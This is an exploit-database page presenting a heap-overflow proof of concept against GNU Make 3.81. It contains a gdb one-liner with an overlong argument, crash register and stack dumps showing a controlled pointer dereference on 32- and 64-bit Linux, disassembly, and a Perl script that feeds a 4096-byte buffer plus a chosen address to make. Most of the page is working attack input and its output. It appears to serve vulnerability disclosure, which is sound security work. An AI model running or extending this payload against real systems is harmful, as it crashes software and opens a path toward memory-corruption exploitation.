Make 3.81 – Heap Overflow (PoC) - 体验盒子

作者： HyP
日期： 2014-07-24
类别：
dos
平台：
linux
来源：https://www.exploit-db.com/exploits/34164/
=for comment
# Exploit Title: MAKE Heap Overflow - Pointer dereferencing POC (Calloc)-X86 X64
# Date: [14.07.14]
# Exploit Author: HyP
# Vendor Homepage: http://www.gnu.org/software/make/
# Software Link: http://ftp.gnu.org/gnu/make/
# Version: Make 3.81
# Tested on: linux32,64 bits (Fedora,Debian,ubuntu,Arch)
# CVE : none

*******************************************************************************************
Special Thanks:

kmkz
Zadyree
Sec0d Team

*******************************************************************************************
*******************************************************************************************
32bits


./checksec.sh --file make
RELRO STACK CANARY NX PIE RPATH
RUNPATH FILE
No RELRO No canary found NX enabled No PIE No RPATH
No RUNPATH make


gdb-peda$ r `perl -e 'print "A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4'`


Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
...
EAX: 0xdeadbeef
EBX: 0x807b971 --> 0x6f2e ('.o')
ECX: 0x0
EDX: 0x1
ESI: 0xdeadbeef
EDI: 0x0
EBP: 0xbfffc5e8 --> 0xbfffc698 --> 0x8081de0 --> 0x0
ESP: 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
EIP: 0x80548b2 (mov eax,DWORD PTR [eax])
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x80548aa: je 0x80548b8
0x80548ac: lea esi,[esi+eiz*1+0x0]
0x80548b0: mov esi,eax
=> 0x80548b2: mov eax,DWORD PTR [eax] <------ Pointer Dereferencing
0x80548b4: test eax,eax
0x80548b6: jne 0x80548b0
0x80548b8: cmp DWORD PTR [ebp-0x1034],0x1
0x80548bf: mov DWORD PTR [ebp-0x10ac],edx
[------------------------------------stack-------------------------------------]
0000| 0xbfffa310 --> 0xbfffb510 --> 0x6f2e ('.o')
0004| 0xbfffa314 --> 0x807b971 --> 0x6f2e ('.o')
0008| 0xbfffa318 --> 0x2
0012| 0xbfffa31c --> 0xb7ffadf8 ("symbol=%s; lookup in file=%s [%lu]\n")
0016| 0xbfffa320 --> 0x0
0020| 0xbfffa324 --> 0x0
0024| 0xbfffa328 --> 0x0
0028| 0xbfffa32c --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x080548b2 in ?? ()


Overflow code:
...
80548aa: 74 0c je 80548b8 <calloc@plt+0xac38>
80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi
80548b0: 89 c6 mov %eax,%esi
80548b2: 8b 00 mov (%eax),%eax
80548b4: 85 c0 test %eax,%eax
80548b6: 75 f8 jne 80548b0 <calloc@plt+0xac30>
...


gdb-peda$ x/x $eax
0x807ff68: 0x00000000

peda vmmap
Start End Perm Name
0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make
0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make

0x08070000 0x08092000 rw-p [heap] // heap overflow !!



*******************************************************************************************
*******************************************************************************************
64bits


Overflow Code :
40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b>
40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
40cc60: 48 89 c3 mov rbx,rax
40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow


Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0xdeadbeefdeadbeef
RBX: 0xdeadbeefdeadbeef
RCX: 0x4242424242424242 ('BBBBBBBB')
RDX: 0x0
RSI: 0x7fffffff97d0 ('A' <repeats 200 times>...)
RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('')
RBP: 0x7fffffffb930 --> 0x1
RSP: 0x7fffffff95f0 --> 0x0
RIP: 0x40cc63 (mov rax,QWORD PTR [rax])
R8 : 0x4242424242424242 ('BBBBBBBB')
R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2])
R10: 0x4242424242424242 ('BBBBBBBB')
R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708
R12: 0x1
R13: 0x0
R14: 0x6397a0 --> 0x6f2e25 ('%.o')
R15: 0x0
EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction
overflow)
[-------------------------------------code-------------------------------------]
0x40cc59: je 0x40cc6b
0x40cc5b: nop DWORD PTR [rax+rax*1+0x0]
0x40cc60: mov rbx,rax
=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing
0x40cc66: test rax,rax
0x40cc69: jne 0x40cc60
0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1
0x40cc72: lea rdi,[rbp-0x40]
[------------------------------------stack-------------------------------------]
0000| 0x7fffffff95f0 --> 0x0
0008| 0x7fffffff95f8 --> 0x0
0016| 0x7fffffff9600 --> 0x0
0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b -->
0x5f7266006362696c ('libc')
0032| 0x7fffffff9610 --> 0xffffffdf
0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541
--> 0x5f726600656b616d ('make')
0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 -->
0x64667b --> 0x5f7266006362696c ('libc')
0056| 0x7fffffff9628 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x000000000040cc63 in ?? ()



*******************************************************************************************
*******************************************************************************************
Proof of Concept - Source code
*******************************************************************************************
*******************************************************************************************
=cut

#!/usr/bin/perl

use 5.010;
use strict;
use warnings;
say "Please set ulimit value to 1000 before (ulimit -c 1000) ";
sleep 0.5;


my $buff = "A"x 4096 ;
my $addr = "\xef\xbe\xad\xde";
my $make = "./make";
my $gdb = "gdb --core core";
my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`);

my $exec= qx($make $PAYLOAD);

say " Reading Core file GDB ";
sleep 0.5;

system ($gdb);